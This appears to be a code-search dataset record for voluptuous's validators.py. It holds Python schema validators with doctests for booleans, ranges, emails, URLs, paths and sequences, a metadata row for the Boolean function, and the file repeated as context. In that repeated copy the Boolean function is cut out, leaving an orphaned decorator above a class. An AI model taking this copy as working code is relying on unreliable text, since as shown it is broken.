@message('value was not true', cls=TrueInvalid)
@truth
def IsTrue(v):
"""Assert that a value is true, in the Python sense.
>>> validate = Schema(IsTrue())
"In the Python sense" means that implicitly false values, such as empty
lists, dictionaries, etc. are treated as "false":
>>> with raises(MultipleInvalid, "value was not true"):
... validate([])
>>> validate([1])
[1]
>>> with raises(MultipleInvalid, "value was not true"):
... validate(False)
...and so on.
>>> try:
... validate([])
... except MultipleInvalid as e:
... assert isinstance(e.errors[0], TrueInvalid)
"""
return v
@message('value was not false', cls=FalseInvalid)
def IsFalse(v):
"""Assert that a value is false, in the Python sense.
(see :func:`IsTrue` for more detail)
>>> validate = Schema(IsFalse())
>>> validate([])
[]
>>> with raises(MultipleInvalid, "value was not false"):
... validate(True)
>>> try:
... validate(True)
... except MultipleInvalid as e:
... assert isinstance(e.errors[0], FalseInvalid)
"""
if v:
raise ValueError
return v
@message('expected boolean', cls=BooleanInvalid)
def Boolean(v):
"""Convert human-readable boolean values to a bool.
Accepted values are 1, true, yes, on, enable, and their negatives.
Non-string values are cast to bool.
>>> validate = Schema(Boolean())
>>> validate(True)
True
>>> validate("1")
True
>>> validate("0")
False
>>> with raises(MultipleInvalid, "expected boolean"):
... validate('moo')
>>> try:
... validate('moo')
... except MultipleInvalid as e:
... assert isinstance(e.errors[0], BooleanInvalid)
"""
if isinstance(v, basestring):
v = v.lower()
if v in ('1', 'true', 'yes', 'on', 'enable'):
return True
if v in ('0', 'false', 'no', 'off', 'disable'):
return False
raise ValueError
return bool(v)
class _WithSubValidators(object):
"""Base class for validators that use sub-validators.
Special class to use as a parent class for validators using sub-validators.
This class provides the `__voluptuous_compile__` method so the
sub-validators are compiled by the parent `Schema`.
"""
def __init__(self, *validators, **kwargs):
self.validators = validators
self.msg = kwargs.pop('msg', None)
self.required = kwargs.pop('required', False)
def __voluptuous_compile__(self, schema):
self._compiled = []
for v in self.validators:
schema.required = self.required
self._compiled.append(schema._compile(v))
return self._run
def _run(self, path, value):
return self._exec(self._compiled, value, path)
def __call__(self, v):
return self._exec((Schema(val) for val in self.validators), v)
def __repr__(self):
return '%s(%s, msg=%r)' % (
self.__class__.__name__,
", ".join(repr(v) for v in self.validators),
self.msg
)
class Any(_WithSubValidators):
"""Use the first validated value.
:param msg: Message to deliver to user if validation fails.
:param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
:returns: Return value of the first validator that passes.
>>> validate = Schema(Any('true', 'false',
... All(Any(int, bool), Coerce(bool))))
>>> validate('true')
'true'
>>> validate(1)
True
>>> with raises(MultipleInvalid, "not a valid value"):
... validate('moo')
msg argument is used
>>> validate = Schema(Any(1, 2, 3, msg="Expected 1 2 or 3"))
>>> validate(1)
1
>>> with raises(MultipleInvalid, "Expected 1 2 or 3"):
... validate(4)
"""
def _exec(self, funcs, v, path=None):
error = None
for func in funcs:
try:
if path is None:
return func(v)
else:
return func(path, v)
except Invalid as e:
if error is None or len(e.path) > len(error.path):
error = e
else:
if error:
raise error if self.msg is None else AnyInvalid(
self.msg, path=path)
raise AnyInvalid(self.msg or 'no valid value found',
path=path)
# Convenience alias
Or = Any
class All(_WithSubValidators):
"""Value must pass all validators.
The output of each validator is passed as input to the next.
:param msg: Message to deliver to user if validation fails.
:param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
>>> validate = Schema(All('10', Coerce(int)))
>>> validate('10')
10
"""
def _exec(self, funcs, v, path=None):
try:
for func in funcs:
if path is None:
v = func(v)
else:
v = func(path, v)
except Invalid as e:
raise e if self.msg is None else AllInvalid(self.msg, path=path)
return v
# Convenience alias
And = All
class Match(object):
"""Value must be a string that matches the regular expression.
>>> validate = Schema(Match(r'^0x[A-F0-9]+$'))
>>> validate('0x123EF4')
'0x123EF4'
>>> with raises(MultipleInvalid, "does not match regular expression"):
... validate('123EF4')
>>> with raises(MultipleInvalid, 'expected string or buffer'):
... validate(123)
Pattern may also be a _compiled regular expression:
>>> validate = Schema(Match(re.compile(r'0x[A-F0-9]+', re.I)))
>>> validate('0x123ef4')
'0x123ef4'
"""
def __init__(self, pattern, msg=None):
if isinstance(pattern, basestring):
pattern = re.compile(pattern)
self.pattern = pattern
self.msg = msg
def __call__(self, v):
try:
match = self.pattern.match(v)
except TypeError:
raise MatchInvalid("expected string or buffer")
if not match:
raise MatchInvalid(self.msg or 'does not match regular expression')
return v
def __repr__(self):
return 'Match(%r, msg=%r)' % (self.pattern.pattern, self.msg)
class Replace(object):
"""Regex substitution.
>>> validate = Schema(All(Replace('you', 'I'),
... Replace('hello', 'goodbye')))
>>> validate('you say hello')
'I say goodbye'
"""
def __init__(self, pattern, substitution, msg=None):
if isinstance(pattern, basestring):
pattern = re.compile(pattern)
self.pattern = pattern
self.substitution = substitution
self.msg = msg
def __call__(self, v):
return self.pattern.sub(self.substitution, v)
def __repr__(self):
return 'Replace(%r, %r, msg=%r)' % (self.pattern.pattern,
self.substitution,
self.msg)
def _url_validation(v):
parsed = urlparse.urlparse(v)
if not parsed.scheme or not parsed.netloc:
raise UrlInvalid("must have a URL scheme and host")
return parsed
@message('expected an Email', cls=EmailInvalid)
def Email(v):
"""Verify that the value is an Email or not.
>>> s = Schema(Email())
>>> with raises(MultipleInvalid, 'expected an Email'):
... s("a.com")
>>> with raises(MultipleInvalid, 'expected an Email'):
... s("a@.com")
>>> with raises(MultipleInvalid, 'expected an Email'):
... s("a@.com")
>>> s('t@x.com')
't@x.com'
"""
try:
if not v or "@" not in v:
raise EmailInvalid("Invalid Email")
user_part, domain_part = v.rsplit('@', 1)
if not (USER_REGEX.match(user_part) and DOMAIN_REGEX.match(domain_part)):
raise EmailInvalid("Invalid Email")
return v
except:
raise ValueError
@message('expected a Fully qualified domain name URL', cls=UrlInvalid)
def FqdnUrl(v):
"""Verify that the value is a Fully qualified domain name URL.
>>> s = Schema(FqdnUrl())
>>> with raises(MultipleInvalid, 'expected a Fully qualified domain name URL'):
... s("http://localhost/")
>>> s('http://w3.org')
'http://w3.org'
"""
try:
parsed_url = _url_validation(v)
if "." not in parsed_url.netloc:
raise UrlInvalid("must have a domain name in URL")
return v
except:
raise ValueError
@message('expected a URL', cls=UrlInvalid)
def Url(v):
"""Verify that the value is a URL.
>>> s = Schema(Url())
>>> with raises(MultipleInvalid, 'expected a URL'):
... s(1)
>>> s('http://w3.org')
'http://w3.org'
"""
try:
_url_validation(v)
return v
except:
raise ValueError
@message('not a file', cls=FileInvalid)
@truth
def IsFile(v):
"""Verify the file exists.
>>> os.path.basename(IsFile()(__file__)).startswith('validators.py')
True
>>> with raises(FileInvalid, 'not a file'):
... IsFile()("random_filename_goes_here.py")
>>> with raises(FileInvalid, 'Not a file'):
... IsFile()(None)
"""
try:
if v:
v = str(v)
return os.path.isfile(v)
else:
raise FileInvalid('Not a file')
except TypeError:
raise FileInvalid('Not a file')
@message('not a directory', cls=DirInvalid)
@truth
def IsDir(v):
"""Verify the directory exists.
>>> IsDir()('/')
'/'
>>> with raises(DirInvalid, 'Not a directory'):
... IsDir()(None)
"""
try:
if v:
v = str(v)
return os.path.isdir(v)
else:
raise DirInvalid("Not a directory")
except TypeError:
raise DirInvalid("Not a directory")
@message('path does not exist', cls=PathInvalid)
@truth
def PathExists(v):
"""Verify the path exists, regardless of its type.
>>> os.path.basename(PathExists()(__file__)).startswith('validators.py')
True
>>> with raises(Invalid, 'path does not exist'):
... PathExists()("random_filename_goes_here.py")
>>> with raises(PathInvalid, 'Not a Path'):
... PathExists()(None)
"""
try:
if v:
v = str(v)
return os.path.exists(v)
else:
raise PathInvalid("Not a Path")
except TypeError:
raise PathInvalid("Not a Path")
def Maybe(validator, msg=None):
"""Validate that the object matches given validator or is None.
:raises Invalid: if the value does not match the given validator and is not
None
>>> s = Schema(Maybe(int))
>>> s(10)
10
>>> with raises(Invalid):
... s("string")
"""
return Any(None, validator, msg=msg)
class Range(object):
"""Limit a value to a range.
Either min or max may be omitted.
Either min or max can be excluded from the range of accepted values.
:raises Invalid: If the value is outside the range.
>>> s = Schema(Range(min=1, max=10, min_included=False))
>>> s(5)
5
>>> s(10)
10
>>> with raises(MultipleInvalid, 'value must be at most 10'):
... s(20)
>>> with raises(MultipleInvalid, 'value must be higher than 1'):
... s(1)
>>> with raises(MultipleInvalid, 'value must be lower than 10'):
... Schema(Range(max=10, max_included=False))(20)
"""
def __init__(self, min=None, max=None, min_included=True,
max_included=True, msg=None):
self.min = min
self.max = max
self.min_included = min_included
self.max_included = max_included
self.msg = msg
def __call__(self, v):
if self.min_included:
if self.min is not None and not v >= self.min:
raise RangeInvalid(
self.msg or 'value must be at least %s' % self.min)
else:
if self.min is not None and not v > self.min:
raise RangeInvalid(
self.msg or 'value must be higher than %s' % self.min)
if self.max_included:
if self.max is not None and not v <= self.max:
raise RangeInvalid(
self.msg or 'value must be at most %s' % self.max)
else:
if self.max is not None and not v < self.max:
raise RangeInvalid(
self.msg or 'value must be lower than %s' % self.max)
return v
def __repr__(self):
return ('Range(min=%r, max=%r, min_included=%r,'
' max_included=%r, msg=%r)' % (self.min, self.max,
self.min_included,
self.max_included,
self.msg))
class Clamp(object):
"""Clamp a value to a range.
Either min or max may be omitted.
>>> s = Schema(Clamp(min=0, max=1))
>>> s(0.5)
0.5
>>> s(5)
1
>>> s(-1)
0
"""
def __init__(self, min=None, max=None, msg=None):
self.min = min
self.max = max
self.msg = msg
def __call__(self, v):
if self.min is not None and v < self.min:
v = self.min
if self.max is not None and v > self.max:
v = self.max
return v
def __repr__(self):
return 'Clamp(min=%s, max=%s)' % (self.min, self.max)
class Length(object):
"""The length of a value must be in a certain range."""
def __init__(self, min=None, max=None, msg=None):
self.min = min
self.max = max
self.msg = msg
def __call__(self, v):
if self.min is not None and len(v) < self.min:
raise LengthInvalid(
self.msg or 'length of value must be at least %s' % self.min)
if self.max is not None and len(v) > self.max:
raise LengthInvalid(
self.msg or 'length of value must be at most %s' % self.max)
return v
def __repr__(self):
return 'Length(min=%s, max=%s)' % (self.min, self.max)
class Datetime(object):
"""Validate that the value matches the datetime format."""
DEFAULT_FORMAT = '%Y-%m-%dT%H:%M:%S.%fZ'
def __init__(self, format=None, msg=None):
self.format = format or self.DEFAULT_FORMAT
self.msg = msg
def __call__(self, v):
try:
datetime.datetime.strptime(v, self.format)
except (TypeError, ValueError):
raise DatetimeInvalid(
self.msg or 'value does not match'
' expected format %s' % self.format)
return v
def __repr__(self):
return 'Datetime(format=%s)' % self.format
class Date(Datetime):
"""Validate that the value matches the date format."""
DEFAULT_FORMAT = '%Y-%m-%d'
def __call__(self, v):
try:
datetime.datetime.strptime(v, self.format)
except (TypeError, ValueError):
raise DateInvalid(
self.msg or 'value does not match'
' expected format %s' % self.format)
return v
def __repr__(self):
return 'Date(format=%s)' % self.format
class In(object):
"""Validate that a value is in a collection."""
def __init__(self, container, msg=None):
self.container = container
self.msg = msg
def __call__(self, v):
try:
check = v not in self.container
except TypeError:
check = True
if check:
raise InInvalid(self.msg or 'value is not allowed')
return v
def __repr__(self):
return 'In(%s)' % (self.container,)
class NotIn(object):
"""Validate that a value is not in a collection."""
def __init__(self, container, msg=None):
self.container = container
self.msg = msg
def __call__(self, v):
try:
check = v in self.container
except TypeError:
check = True
if check:
raise NotInInvalid(self.msg or 'value is not allowed')
return v
def __repr__(self):
return 'NotIn(%s)' % (self.container,)
class Contains(object):
"""Validate that the given schema element is in the sequence being validated.
>>> s = Contains(1)
>>> s([3, 2, 1])
[3, 2, 1]
>>> with raises(ContainsInvalid, 'value is not allowed'):
... s([3, 2])
"""
def __init__(self, item, msg=None):
self.item = item
self.msg = msg
def __call__(self, v):
try:
check = self.item not in v
except TypeError:
check = True
if check:
raise ContainsInvalid(self.msg or 'value is not allowed')
return v
def __repr__(self):
return 'Contains(%s)' % (self.item,)
class ExactSequence(object):
"""Matches each element in a sequence against the corresponding element in
the validators.
:param msg: Message to deliver to user if validation fails.
:param kwargs: All other keyword arguments are passed to the sub-Schema
constructors.
>>> from voluptuous import Schema, ExactSequence
>>> validate = Schema(ExactSequence([str, int, list, list]))
>>> validate(['hourly_report', 10, [], []])
['hourly_report', 10, [], []]
>>> validate(('hourly_report', 10, [], []))
('hourly_report', 10, [], [])
"""
def __init__(self, validators, **kwargs):
self.validators = validators
self.msg = kwargs.pop('msg', None)
self._schemas = [Schema(val, **kwargs) for val in validators]
def __call__(self, v):
if not isinstance(v, (list, tuple)) or len(v) != len(self._schemas):
raise ExactSequenceInvalid(self.msg)
try:
v = type(v)(schema(x) for x, schema in zip(v, self._schemas))
except Invalid as e:
raise e if self.msg is None else ExactSequenceInvalid(self.msg)
return v
def __repr__(self):
return 'ExactSequence([%s])' % (", ".join(repr(v)
for v in self.validators))
class Unique(object):
"""Ensure an iterable does not contain duplicate items.
Only iterables convertable to a set are supported (native types and
objects with correct __eq__).
JSON does not support set, so they need to be presented as arrays.
Unique allows ensuring that such array does not contain dupes.
>>> s = Schema(Unique())
>>> s([])
[]
>>> s([1, 2])
[1, 2]
>>> with raises(Invalid, 'contains duplicate items: [1]'):
... s([1, 1, 2])
>>> with raises(Invalid, "contains duplicate items: ['one']"):
... s(['one', 'two', 'one'])
>>> with raises(Invalid, regex="^contains unhashable elements: "):
... s([set([1, 2]), set([3, 4])])
>>> s('abc')
'abc'
>>> with raises(Invalid, regex="^contains duplicate items: "):
... s('aabbc')
"""
def __init__(self, msg=None):
self.msg = msg
def __call__(self, v):
try:
set_v = set(v)
except TypeError as e:
raise TypeInvalid(
self.msg or 'contains unhashable elements: {0}'.format(e))
if len(set_v) != len(v):
seen = set()
dupes = list(set(x for x in v if x in seen or seen.add(x)))
raise Invalid(
self.msg or 'contains duplicate items: {0}'.format(dupes))
return v
def __repr__(self):
return 'Unique()'
class Equal(object):
"""Ensure that value matches target.
>>> s = Schema(Equal(1))
>>> s(1)
1
>>> with raises(Invalid):
... s(2)
Validators are not supported, match must be exact:
>>> s = Schema(Equal(str))
>>> with raises(Invalid):
... s('foo')
"""
def __init__(self, target, msg=None):
self.target = target
self.msg = msg
def __call__(self, v):
if v != self.target:
raise Invalid(self.msg or 'Values are not equal: value:{} != target:{}'.format(v, self.target))
return v
def __repr__(self):
return 'Equal({})'.format(self.target)
class Unordered(object):
"""Ensures sequence contains values in unspecified order.
>>> s = Schema(Unordered([2, 1]))
>>> s([2, 1])
[2, 1]
>>> s([1, 2])
[1, 2]
>>> s = Schema(Unordered([str, int]))
>>> s(['foo', 1])
['foo', 1]
>>> s([1, 'foo'])
[1, 'foo']
"""
def __init__(self, validators, msg=None, **kwargs):
self.validators = validators
self.msg = msg
self._schemas = [Schema(val, **kwargs) for val in validators]
def __call__(self, v):
if not isinstance(v, (list, tuple)):
raise Invalid(self.msg or 'Value {} is not sequence!'.format(v))
if len(v) != len(self._schemas):
raise Invalid(self.msg or 'List lengths differ, value:{} != target:{}'.format(len(v), len(self._schemas)))
consumed = set()
missing = []
for index, value in enumerate(v):
found = False
for i, s in enumerate(self._schemas):
if i in consumed:
continue
try:
s(value)
except Invalid:
pass
else:
found = True
consumed.add(i)
break
if not found:
missing.append((index, value))
if len(missing) == 1:
el = missing[0]
raise Invalid(self.msg or 'Element #{} ({}) is not valid against any validator'.format(el[0], el[1]))
elif missing:
raise MultipleInvalid([Invalid(self.msg or 'Element #{} ({}) is not valid against any validator'.format(
el[0], el[1])) for el in missing])
return v
def __repr__(self):
return 'Unordered([{}])'.format(", ".join(repr(v) for v in self.validators))
class Number(object):
"""
Verify the number of digits that are present in the number(Precision),
and the decimal places(Scale)
:raises Invalid: If the value does not match the provided Precision and Scale.
>>> schema = Schema(Number(precision=6, scale=2))
>>> schema('1234.01')
'1234.01'
>>> schema = Schema(Number(precision=6, scale=2, yield_decimal=True))
>>> schema('1234.01')
Decimal('1234.01')
"""
def __init__(self, precision=None, scale=None, msg=None, yield_decimal=False):
self.precision = precision
self.scale = scale
self.msg = msg
self.yield_decimal = yield_decimal
def __call__(self, v):
"""
:param v: is a number enclosed with string
:return: Decimal number
"""
precision, scale, decimal_num = self._get_precision_scale(v)
if self.precision is not None and self.scale is not None and precision != self.precision\
and scale != self.scale:
raise Invalid(self.msg or "Precision must be equal to %s, and Scale must be equal to %s" % (self.precision,
self.scale))
else:
if self.precision is not None and precision != self.precision:
raise Invalid(self.msg or "Precision must be equal to %s" % self.precision)
if self.scale is not None and scale != self.scale:
raise Invalid(self.msg or "Scale must be equal to %s" % self.scale)
if self.yield_decimal:
return decimal_num
else:
return v
def __repr__(self):
return ('Number(precision=%s, scale=%s, msg=%s)' % (self.precision, self.scale, self.msg))
def _get_precision_scale(self, number):
"""
:param number:
:return: tuple(precision, scale, decimal_number)
"""
try:
decimal_num = Decimal(number)
except InvalidOperation:
raise Invalid(self.msg or 'Value must be a number enclosed with string')
return (len(decimal_num.as_tuple().digits), -(decimal_num.as_tuple().exponent), decimal_num)
class SomeOf(_WithSubValidators):
"""Value must pass at least some validations, determined by the given parameter.
Optionally, number of passed validations can be capped.
The output of each validator is passed as input to the next.
:param min_valid: Minimum number of valid schemas.
:param validators: a list of schemas or validators to match input against
:param max_valid: Maximum number of valid schemas.
:param msg: Message to deliver to user if validation fails.
:param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
:raises NotEnoughValid: if the minimum number of validations isn't met
:raises TooManyValid: if the more validations than the given amount is met
>>> validate = Schema(SomeOf(min_valid=2, validators=[Range(1, 5), Any(float, int), 6.6]))
>>> validate(6.6)
6.6
>>> validate(3)
3
>>> with raises(MultipleInvalid, 'value must be at most 5, not a valid value'):
... validate(6.2)
"""
def __init__(self, validators, min_valid=None, max_valid=None, **kwargs):
assert min_valid is not None or max_valid is not None, \
'when using "%s" you should specify at least one of min_valid and max_valid' % (type(self).__name__,)
self.min_valid = min_valid or 0
self.max_valid = max_valid or len(validators)
super(SomeOf, self).__init__(*validators, **kwargs)
def _exec(self, funcs, v, path=None):
errors = []
funcs = list(funcs)
for func in funcs:
try:
if path is None:
v = func(v)
else:
v = func(path, v)
except Invalid as e:
errors.append(e)
passed_count = len(funcs) - len(errors)
if self.min_valid <= passed_count <= self.max_valid:
return v
msg = self.msg
if not msg:
msg = ', '.join(map(str, errors))
if passed_count > self.max_valid:
raise TooManyValid(msg)
raise NotEnoughValid(msg)
def __repr__(self):
return 'SomeOf(min_valid=%s, validators=[%s], max_valid=%s, msg=%r)' % (
self.min_valid, ", ".join(repr(v) for v in self.validators), self.max_valid, self.msg)
|
alecthomas/voluptuous | voluptuous/validators.py | Boolean | python | def Boolean(v):
if isinstance(v, basestring):
v = v.lower()
if v in ('1', 'true', 'yes', 'on', 'enable'):
return True
if v in ('0', 'false', 'no', 'off', 'disable'):
return False
raise ValueError
return bool(v) | Convert human-readable boolean values to a bool.
Accepted values are 1, true, yes, on, enable, and their negatives.
Non-string values are cast to bool.
>>> validate = Schema(Boolean())
>>> validate(True)
True
>>> validate("1")
True
>>> validate("0")
False
>>> with raises(MultipleInvalid, "expected boolean"):
... validate('moo')
>>> try:
... validate('moo')
... except MultipleInvalid as e:
... assert isinstance(e.errors[0], BooleanInvalid) | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/validators.py#L154-L181 | null | import os
import re
import datetime
import sys
from functools import wraps
from decimal import Decimal, InvalidOperation
from voluptuous.schema_builder import Schema, raises, message
from voluptuous.error import (MultipleInvalid, CoerceInvalid, TrueInvalid, FalseInvalid, BooleanInvalid, Invalid,
AnyInvalid, AllInvalid, MatchInvalid, UrlInvalid, EmailInvalid, FileInvalid, DirInvalid,
RangeInvalid, PathInvalid, ExactSequenceInvalid, LengthInvalid, DatetimeInvalid,
DateInvalid, InInvalid, TypeInvalid, NotInInvalid, ContainsInvalid, NotEnoughValid,
TooManyValid)
if sys.version_info >= (3,):
import urllib.parse as urlparse
basestring = str
else:
import urlparse
# Taken from https://github.com/kvesteri/validators/blob/master/validators/email.py
USER_REGEX = re.compile(
# dot-atom
r"(^[-!#$%&'*+/=?^_`{}|~0-9A-Z]+"
r"(\.[-!#$%&'*+/=?^_`{}|~0-9A-Z]+)*$"
# quoted-string
r'|^"([\001-\010\013\014\016-\037!#-\[\]-\177]|'
r"""\\[\001-\011\013\014\016-\177])*"$)""",
re.IGNORECASE
)
DOMAIN_REGEX = re.compile(
# domain
r'(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+'
r'(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?$)'
# literal form, ipv4 address (SMTP 4.1.3)
r'|^\[(25[0-5]|2[0-4]\d|[0-1]?\d?\d)'
r'(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\]$',
re.IGNORECASE)
__author__ = 'tusharmakkar08'
def truth(f):
"""Convenience decorator to convert truth functions into validators.
>>> @truth
... def isdir(v):
... return os.path.isdir(v)
>>> validate = Schema(isdir)
>>> validate('/')
'/'
>>> with raises(MultipleInvalid, 'not a valid value'):
... validate('/notavaliddir')
"""
@wraps(f)
def check(v):
t = f(v)
if not t:
raise ValueError
return v
return check
class Coerce(object):
"""Coerce a value to a type.
If the type constructor throws a ValueError or TypeError, the value
will be marked as Invalid.
Default behavior:
>>> validate = Schema(Coerce(int))
>>> with raises(MultipleInvalid, 'expected int'):
... validate(None)
>>> with raises(MultipleInvalid, 'expected int'):
... validate('foo')
With custom message:
>>> validate = Schema(Coerce(int, "moo"))
>>> with raises(MultipleInvalid, 'moo'):
... validate('foo')
"""
def __init__(self, type, msg=None):
self.type = type
self.msg = msg
self.type_name = type.__name__
def __call__(self, v):
try:
return self.type(v)
except (ValueError, TypeError, InvalidOperation):
msg = self.msg or ('expected %s' % self.type_name)
raise CoerceInvalid(msg)
def __repr__(self):
return 'Coerce(%s, msg=%r)' % (self.type_name, self.msg)
@message('value was not true', cls=TrueInvalid)
@truth
def IsTrue(v):
"""Assert that a value is true, in the Python sense.
>>> validate = Schema(IsTrue())
"In the Python sense" means that implicitly false values, such as empty
lists, dictionaries, etc. are treated as "false":
>>> with raises(MultipleInvalid, "value was not true"):
... validate([])
>>> validate([1])
[1]
>>> with raises(MultipleInvalid, "value was not true"):
... validate(False)
...and so on.
>>> try:
... validate([])
... except MultipleInvalid as e:
... assert isinstance(e.errors[0], TrueInvalid)
"""
return v
@message('value was not false', cls=FalseInvalid)
def IsFalse(v):
"""Assert that a value is false, in the Python sense.
(see :func:`IsTrue` for more detail)
>>> validate = Schema(IsFalse())
>>> validate([])
[]
>>> with raises(MultipleInvalid, "value was not false"):
... validate(True)
>>> try:
... validate(True)
... except MultipleInvalid as e:
... assert isinstance(e.errors[0], FalseInvalid)
"""
if v:
raise ValueError
return v
@message('expected boolean', cls=BooleanInvalid)
class _WithSubValidators(object):
"""Base class for validators that use sub-validators.
Special class to use as a parent class for validators using sub-validators.
This class provides the `__voluptuous_compile__` method so the
sub-validators are compiled by the parent `Schema`.
"""
def __init__(self, *validators, **kwargs):
self.validators = validators
self.msg = kwargs.pop('msg', None)
self.required = kwargs.pop('required', False)
def __voluptuous_compile__(self, schema):
self._compiled = []
for v in self.validators:
schema.required = self.required
self._compiled.append(schema._compile(v))
return self._run
def _run(self, path, value):
return self._exec(self._compiled, value, path)
def __call__(self, v):
return self._exec((Schema(val) for val in self.validators), v)
def __repr__(self):
return '%s(%s, msg=%r)' % (
self.__class__.__name__,
", ".join(repr(v) for v in self.validators),
self.msg
)
class Any(_WithSubValidators):
"""Use the first validated value.
:param msg: Message to deliver to user if validation fails.
:param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
:returns: Return value of the first validator that passes.
>>> validate = Schema(Any('true', 'false',
... All(Any(int, bool), Coerce(bool))))
>>> validate('true')
'true'
>>> validate(1)
True
>>> with raises(MultipleInvalid, "not a valid value"):
... validate('moo')
msg argument is used
>>> validate = Schema(Any(1, 2, 3, msg="Expected 1 2 or 3"))
>>> validate(1)
1
>>> with raises(MultipleInvalid, "Expected 1 2 or 3"):
... validate(4)
"""
def _exec(self, funcs, v, path=None):
error = None
for func in funcs:
try:
if path is None:
return func(v)
else:
return func(path, v)
except Invalid as e:
if error is None or len(e.path) > len(error.path):
error = e
else:
if error:
raise error if self.msg is None else AnyInvalid(
self.msg, path=path)
raise AnyInvalid(self.msg or 'no valid value found',
path=path)
# Convenience alias
Or = Any
class All(_WithSubValidators):
"""Value must pass all validators.
The output of each validator is passed as input to the next.
:param msg: Message to deliver to user if validation fails.
:param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
>>> validate = Schema(All('10', Coerce(int)))
>>> validate('10')
10
"""
def _exec(self, funcs, v, path=None):
try:
for func in funcs:
if path is None:
v = func(v)
else:
v = func(path, v)
except Invalid as e:
raise e if self.msg is None else AllInvalid(self.msg, path=path)
return v
# Convenience alias
And = All
class Match(object):
"""Value must be a string that matches the regular expression.
>>> validate = Schema(Match(r'^0x[A-F0-9]+$'))
>>> validate('0x123EF4')
'0x123EF4'
>>> with raises(MultipleInvalid, "does not match regular expression"):
... validate('123EF4')
>>> with raises(MultipleInvalid, 'expected string or buffer'):
... validate(123)
Pattern may also be a _compiled regular expression:
>>> validate = Schema(Match(re.compile(r'0x[A-F0-9]+', re.I)))
>>> validate('0x123ef4')
'0x123ef4'
"""
def __init__(self, pattern, msg=None):
if isinstance(pattern, basestring):
pattern = re.compile(pattern)
self.pattern = pattern
self.msg = msg
def __call__(self, v):
try:
match = self.pattern.match(v)
except TypeError:
raise MatchInvalid("expected string or buffer")
if not match:
raise MatchInvalid(self.msg or 'does not match regular expression')
return v
def __repr__(self):
return 'Match(%r, msg=%r)' % (self.pattern.pattern, self.msg)
class Replace(object):
"""Regex substitution.
>>> validate = Schema(All(Replace('you', 'I'),
... Replace('hello', 'goodbye')))
>>> validate('you say hello')
'I say goodbye'
"""
def __init__(self, pattern, substitution, msg=None):
if isinstance(pattern, basestring):
pattern = re.compile(pattern)
self.pattern = pattern
self.substitution = substitution
self.msg = msg
def __call__(self, v):
return self.pattern.sub(self.substitution, v)
def __repr__(self):
return 'Replace(%r, %r, msg=%r)' % (self.pattern.pattern,
self.substitution,
self.msg)
def _url_validation(v):
parsed = urlparse.urlparse(v)
if not parsed.scheme or not parsed.netloc:
raise UrlInvalid("must have a URL scheme and host")
return parsed
@message('expected an Email', cls=EmailInvalid)
def Email(v):
"""Verify that the value is an Email or not.
>>> s = Schema(Email())
>>> with raises(MultipleInvalid, 'expected an Email'):
... s("a.com")
>>> with raises(MultipleInvalid, 'expected an Email'):
... s("a@.com")
>>> with raises(MultipleInvalid, 'expected an Email'):
... s("a@.com")
>>> s('t@x.com')
't@x.com'
"""
try:
if not v or "@" not in v:
raise EmailInvalid("Invalid Email")
user_part, domain_part = v.rsplit('@', 1)
if not (USER_REGEX.match(user_part) and DOMAIN_REGEX.match(domain_part)):
raise EmailInvalid("Invalid Email")
return v
except:
raise ValueError
@message('expected a Fully qualified domain name URL', cls=UrlInvalid)
def FqdnUrl(v):
"""Verify that the value is a Fully qualified domain name URL.
>>> s = Schema(FqdnUrl())
>>> with raises(MultipleInvalid, 'expected a Fully qualified domain name URL'):
... s("http://localhost/")
>>> s('http://w3.org')
'http://w3.org'
"""
try:
parsed_url = _url_validation(v)
if "." not in parsed_url.netloc:
raise UrlInvalid("must have a domain name in URL")
return v
except:
raise ValueError
@message('expected a URL', cls=UrlInvalid)
def Url(v):
"""Verify that the value is a URL.
>>> s = Schema(Url())
>>> with raises(MultipleInvalid, 'expected a URL'):
... s(1)
>>> s('http://w3.org')
'http://w3.org'
"""
try:
_url_validation(v)
return v
except:
raise ValueError
@message('not a file', cls=FileInvalid)
@truth
def IsFile(v):
"""Verify the file exists.
>>> os.path.basename(IsFile()(__file__)).startswith('validators.py')
True
>>> with raises(FileInvalid, 'not a file'):
... IsFile()("random_filename_goes_here.py")
>>> with raises(FileInvalid, 'Not a file'):
... IsFile()(None)
"""
try:
if v:
v = str(v)
return os.path.isfile(v)
else:
raise FileInvalid('Not a file')
except TypeError:
raise FileInvalid('Not a file')
@message('not a directory', cls=DirInvalid)
@truth
def IsDir(v):
"""Verify the directory exists.
>>> IsDir()('/')
'/'
>>> with raises(DirInvalid, 'Not a directory'):
... IsDir()(None)
"""
try:
if v:
v = str(v)
return os.path.isdir(v)
else:
raise DirInvalid("Not a directory")
except TypeError:
raise DirInvalid("Not a directory")
@message('path does not exist', cls=PathInvalid)
@truth
def PathExists(v):
"""Verify the path exists, regardless of its type.
>>> os.path.basename(PathExists()(__file__)).startswith('validators.py')
True
>>> with raises(Invalid, 'path does not exist'):
... PathExists()("random_filename_goes_here.py")
>>> with raises(PathInvalid, 'Not a Path'):
... PathExists()(None)
"""
try:
if v:
v = str(v)
return os.path.exists(v)
else:
raise PathInvalid("Not a Path")
except TypeError:
raise PathInvalid("Not a Path")
def Maybe(validator, msg=None):
"""Validate that the object matches given validator or is None.
:raises Invalid: if the value does not match the given validator and is not
None
>>> s = Schema(Maybe(int))
>>> s(10)
10
>>> with raises(Invalid):
... s("string")
"""
return Any(None, validator, msg=msg)
class Range(object):
"""Limit a value to a range.
Either min or max may be omitted.
Either min or max can be excluded from the range of accepted values.
:raises Invalid: If the value is outside the range.
>>> s = Schema(Range(min=1, max=10, min_included=False))
>>> s(5)
5
>>> s(10)
10
>>> with raises(MultipleInvalid, 'value must be at most 10'):
... s(20)
>>> with raises(MultipleInvalid, 'value must be higher than 1'):
... s(1)
>>> with raises(MultipleInvalid, 'value must be lower than 10'):
... Schema(Range(max=10, max_included=False))(20)
"""
def __init__(self, min=None, max=None, min_included=True,
max_included=True, msg=None):
self.min = min
self.max = max
self.min_included = min_included
self.max_included = max_included
self.msg = msg
def __call__(self, v):
if self.min_included:
if self.min is not None and not v >= self.min:
raise RangeInvalid(
